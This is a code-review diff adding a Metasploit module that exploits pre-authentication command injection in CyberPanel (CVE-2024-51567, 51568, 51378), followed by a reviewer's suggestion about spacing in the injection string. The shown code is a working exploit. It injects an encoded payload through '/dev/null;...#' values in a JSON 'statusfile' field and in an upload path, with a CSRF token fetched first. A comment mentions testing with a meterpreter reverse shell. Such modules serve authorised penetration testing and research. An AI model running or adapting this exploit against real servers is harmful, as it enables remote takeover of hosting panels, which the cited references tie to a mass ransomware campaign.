modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb

```diff
@@ -0,0 +1,142 @@
+          'Valentin Lobstein',     # Metasploit Module
+          'Luka Petrovic (refr4g)' # Vulnerability discovery (CVE-2024-51378)
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-51567'],
+          ['CVE', '2024-51568'],
+          ['CVE', '2024-51378'],
+          ['URL', 'https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce'],
+          ['URL', 'https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/'],
+          ['URL', 'https://github.com/DreyAnd/CyberPanel-RCE'],
+          ['URL', 'https://github.com/refr4g/CVE-2024-51378'],
+          ['URL', 'https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/'],
+          ['URL', 'https://gist.github.com/gboddin/d78823245b518edd54bfc2301c5f8882']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2024-10-27',
+        'Actions' => [
+          ['CVE-2024-51567', { 'Description' => 'Exploit using CVE-2024-51567' }],
+          ['CVE-2024-51568', { 'Description' => 'Exploit using CVE-2024-51568' }],
+          ['CVE-2024-51378', { 'Description' => 'Exploit using CVE-2024-51378' }]
+        ],
+        'DefaultAction' => 'CVE-2024-51567',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8090)
+    ])
+  end
+
+  def exploit
+    case action.name.downcase
+    when 'cve-2024-51567'
+      execute_status_update('dataBases/upgrademysqlstatus')
+    when 'cve-2024-51568'
+      execute_filemanager_upload
+    when 'cve-2024-51378'
+      execute_status_update("#{['ftp', 'dns'].sample}/getresetstatus")
+    else
+      fail_with(Failure::BadConfig, 'Invalid ACTION selected')
+    end
+  end
+
+  def execute_status_update(endpoint)
+    payload_data = '{"statusfile": "/dev/null;%s #"}' % payload.encoded
+
+    send_request_cgi({
+      'method' => 'OPTIONS',
+      'uri' => normalize_uri(target_uri.path, endpoint),
+      'data' => payload_data,
+      'headers' => {
+        'Content-Type' => 'application/json',
+        'X-CSRFToken' => get_csrf_token
+      }
+    }, 0)
+  end
+
+  def execute_filemanager_upload
+    csrf_token = get_csrf_token
+
+    post_data = Rex::MIME::Message.new
+
+    random_domain = Rex::Text.rand_text_alphanumeric(8)
+
+    random_complete_path = "/dev/null;#{payload.encoded}#"
```

Comment:
```suggestion
    random_complete_path = "/dev/null;#{payload.encoded} #"
```

a leading space is required for comments